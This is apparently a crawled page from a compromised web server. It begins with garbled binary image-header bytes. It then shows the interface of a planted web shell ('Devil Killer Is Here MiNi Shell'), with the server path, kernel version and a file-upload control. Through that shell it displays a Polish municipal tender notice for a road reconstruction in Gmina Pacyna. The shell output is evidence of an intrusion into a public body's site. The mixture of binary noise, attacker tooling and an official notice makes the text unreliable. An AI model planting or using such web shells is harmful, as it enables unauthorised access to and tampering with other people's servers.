JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210921/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210921/0018718502-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi wewnętrznej w miejscowości Model ulica Leśna i Spacerowa </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA PACYNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 611015810</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wyzwolenia 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pacyna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-541</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL923 - Płocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">24 2858054</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.promocja@pacyna.mazowsze.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.pacyna.mazowsze.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi wewnętrznej w miejscowości Model ulica Leśna i Spacerowa </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-be211c74-1ab0-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00187185</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00005015/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Przebudowa drogi w miejścowości Model, na dz. Nr 86 i 95 ulica Leśna i Spacerowa </p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.pacyna.mazowsze.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl<br/>https://epuap.gov.pl/wps/portal zamowienia.promocja@pacyna.mazowsze.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz<br/>przekazywanie dokumentów oświadczeń między zamawiającym, a wykonawcą, z uwzględnieniem<br/>wyjątków określonych w ustawie, odbywa się przy użyciu środków komunikacji elektronicznej w<br/>rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług droga elektroniczną ( t. j. Dz. U. z 2020<br/>r., poz. 344) a) W postępowaniu o udzielenie zamówienia komunikacja między zamawiającym a<br/>Wykonawcami odbywa się przy użyciu miniPortalu , (https://miniportal.uzp.gov.pl) ePUAPu,<br/>(https://epuap.gov.pl/wps/portal) oraz poczty elektronicznej. b) Zamawiający informuje, iż<br/>przekazywanie dokumentów, o których mowa w treści § 2 ust. 1 Rozporządzenie Prezesa Rady<br/>Ministrów z dnia 31 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452),<br/>odbywa się przy użyciu miniPortalu https://miniportal.uzp.gov.pl, ePUAPu<br/>https://epuap.gov.pl/wps/portal ( za pośrednictwem dedykowanego formularza dostępnego na ePUAP<br/>oraz udostępnionego przez miniPotral – Formularz do komunikacji). c) Przekazywanie dokumentów<br/>wykazanych w § 2 ust. 2 w/w Rozporządzenia może nastąpić w sposób określony powyżej lit b) lub za<br/>pośrednictwem e-mail: zamowienia.promocja@pacyna.mazowsze.pl. Każda ze stron na żądanie<br/>drugiej niezwłocznie potwierdza fakt otrzymania przesłanego za pośrednictwem e-mail pisma lub<br/>dokumentu lub wiadomości. d) We wszelkiej korespondencji związanej z niniejszym postępowaniem<br/>Zamawiający i Wykonawcy posługują się numerem ogłoszenia ( TED lub ID postępowania). e)<br/>Dokumenty elektroniczne składane są przez Wykonawcę za pośrednictwem Formularza do<br/>komunikacji jako załączniki. Sposób sporządzenia dokumentów elektronicznych musi być zgodny z<br/>wymaganiami określonymi w rozporządzeniu Prezesa rady Ministrów z dnia 31 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452) oraz rozporządzeniu Ministra<br/>Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowychoraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z<br/>2020 r., poz. 2415) f) Adres skrzynki ePUAP: /v074c8hprv/skrytka g) Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.<br/>Wykonawca posiadający konto na ePUAP ma dostęp do formularzy : „ Formularz do złożenia ,<br/>wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”. h) Wymagania techniczne i<br/>organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie<br/>korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług<br/>administracji publicznej ePUAP. i) Maksymalny rozmiar plików przesyłanych za pośrednictwem<br/>dedykowanych formularzy : „Formularz złożenia zmiany, wycofania oferty lub wniosku” oraz „Formularz<br/>do komunikacji” wynosi 150 MB. j) Identyfikator postępowania i link dla danego postępowania o<br/>udzielenie zamówienia dostępne są na liście wszystkich postępowań na miniPortalu, klikając wcześniej<br/>opcje „Dla Wykonawców” lub ze strony głównej z zakładki „Postępowania”. k) Identyfikator<br/>postępowania i link dla danego postępowania o udzielenie zamówienia dostępne są na liście<br/>wszystkich postępowań na miniPortalu,Adres poczty elektronicznej e-mail:<br/>zamowienia.promocja@pacyna.mazowsze.pl Stroną internetową prowadzonego postępowania jest<br/>strona internetowa Zamawiającego bip.pacyna.mazowsze.pl .</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://miniportal.uzp.gov.pl https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE)2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str.1) ,dalej „RODO” ,informuję ,że: Administratorem Pani/Pana danych osobowych w<br/>Urzędzie Gminy Pacyna jest Wójt Gminy Pacyna/Gmina Pacyna z siedzibą w: 09-541 Pacyna, ul.<br/>Wyzwolenia 7 , tel. 24 285 80 54, Inspektorem ochrony danych osobowych w Urzędzie Gminy Pacyna,<br/>ul. Wyzwolenia 7, 09- 541 Pacyna jest Pan Damian Busler, e-mail: iodo@pacyna.mazowsze.pl;<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz zawarcia<br/>umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny stosowania sformalizowanych<br/>procedur udzielania zamówień publicznych spoczywających na Zamawiającym. Odbiorcami Pani/Pana<br/>danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień<br/>publicznych (tj. Dz. U. z 2019 r. poz. 2019 ze zm.), dalej „ustawa Pzp”;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Pani/Pana dane osobowe będą przechowywane, zgodnie z<br/>art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie<br/>zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana<br/>dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawy Pzp; W odniesieniu do Pani/Pana danych osobowych decyzje nie będą<br/>podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;Posiada Pani/Pan:− na<br/>podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;− na podstawie<br/>art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;− na podstawie art. 18 RODO<br/>prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; − prawo do wniesienia skargi do Prezesa Urzędu<br/>Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana<br/>dotyczących narusza przepisy RODO;Nie przysługuje Pani/Panu:− w związku z art. 17 ust. 3 lit. b, d lub<br/>e RODO prawo do usunięcia danych osobowych;− prawo do przenoszenia danych osobowych, o<br/>którym mowa w art. 20 RODO;− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania<br/>danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust.<br/>1 lit. c RODO.Wykonawca, wypełniając obowiązki informacyjne wynikające z art. 13 lub art. 14 RODO<br/>względem osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio pozyskał w celu<br/>ubiegania się o udzielenie zamówienia publicznego w tym postępowaniu składa stosowne<br/>oświadczenie zawarte w Formularzu „ofertowym (załącznik nr 1 do SWZ)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZPPG.271.6.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Przedmiotem zamówienia jest Przebudowa drogi wewnętrznej w miejscowości Model ulica<br/>Leśna i Spacerowa.<br/>2.Wspólny Słownik Zamówień CPV:<br/>45233142-6 - roboty w zakresie naprawy dróg<br/>45233220-7 - roboty w zakresie nawierzchni dróg<br/>3. Zamawiający nie dopuszcza składania ofert częściowych.<br/>4. Zamawiający nie dopuszcza składania ofert wariantowych oraz w postaci katalogów<br/>elektronicznych.<br/>5. Szczegółowy zakres przedmiotu zamówienia określają niżej wymienione dokumenty:<br/>1. specyfikacja techniczna - załącznik nr 8<br/>2. przedmiar robót - załącznik nr 9 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233142-6 - Roboty w zakresie naprawy dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-10-25</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Cena podana na Formularzu Ofertowym jest ceną ostateczną, niepodlegającą negocjacji i wyczerpującą wszelkie należności Wykonawcy wobec Zamawiającego<br/>związane z realizacją przedmiotu zamówienia.<br/>2. Cena oferty powinna być wyrażona w złotych polskich (PLN) z dokładnością do dwóch miejsc po<br/>przecinku.<br/>3.Zamawiający nie przewiduje rozliczeń w walucie obcej.<br/>4.Wyliczona cena oferty brutto będzie służyć do porównania złożonych ofert i do rozliczenia w trakcie<br/>realizacji zamówienia.<br/>5.Jeżeli została złożona oferta, której wybór prowadziłby do powstania u zamawiającego obowiązku<br/>podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz. U. z 2020 r.<br/>poz. 106), dla celów zastosowania kryterium ceny lub kosztu zamawiający dolicza do przedstawionej w<br/>tej ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć. W ofercie, o której<br/>mowa w ust. 1, wykonawca ma obowiązek:<br/>1) poinformowania zamawiającego, że wybór jego oferty będzie prowadził do powstania u<br/>zamawiającego obowiązku podatkowego;<br/>2) wskazania nazwy (rodzaju) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do<br/>powstania obowiązku podatkowego;<br/>3) wskazania wartości towaru lub usługi objętego obowiązkiem podatkowym zamawiającego, bez<br/>kwoty podatku;<br/>4) wskazania stawki podatku od towarów i usług, która zgodnie z wiedzą wykonawcy, będzie miała<br/>zastosowanie.<br/>6.Wzór Formularza Ofertowego został opracowany przy założeniu, iż wybór oferty nie będzie<br/>prowadzić do powstania u Zamawiającego obowiązku podatkowego w zakresie podatku VAT. W<br/>przypadku, gdy Wykonawca zobowiązany jest złożyć oświadczenie o powstaniu u Zamawiającego<br/>obowiązku podatkowego, to winien odpowiednio zmodyfikować treść formularza.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na<br/>zasadach określonych w Rozdziale VI SWZ, oraz spełniają określone przez Zamawiającego<br/>warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że:<br/>a) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, wykonał należycie co najmniej dwie (2) roboty<br/>budowlane polegające na remoncie, budowie, rozbudowie lub przebudowie drogi publicznej o<br/>wartości co najmniej 300 000,00 zł brutto każda, obejmujące w swym zakresie wykonanie<br/>nawierzchni bitumicznej - załącznik nr 4 do SWZ;<br/>b) dysponuje minimum jedną osobą, która będzie pełniła funkcję kierownika robót posiadającą<br/>uprawnienia do kierowania robotami budowlanymi w specjalności drogowej lub odpowiadające<br/>im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów - załącznik nr 5 do SWZ.<br/>3. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej -<br/>dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada<br/>wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w<br/>szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne<br/>przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień<br/>składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do<br/>wykluczenia z postępowania - zgodnie z załącznikiem nr 3 do SWZ;<br/>2. Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne potwierdzenie, że<br/>Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>3. Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia,<br/>aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>4. Podmiotowe środki dowodowe wymagane od wykonawcy obejmują;<br/>1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2020 r. poz. 1076 ze zm.), z innym wykonawcą, który złożył odrębną ofertę,<br/>albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do<br/>tej samej grupy kapitałowej - załącznik nr 6 do SWZ;<br/>2) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>3) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów - inne odpowiednie dokumenty - załącznik nr 4 do SWZ (na<br/>potwierdzenie spełniania warunku określonego w Rozdziale V ust. 2 pkt 4 lit. a SWZ);<br/>4) Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego<br/>odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich uprawnień<br/>oraz informacją o podstawie do dysponowania tymi osobami - załącznik nr 5 do 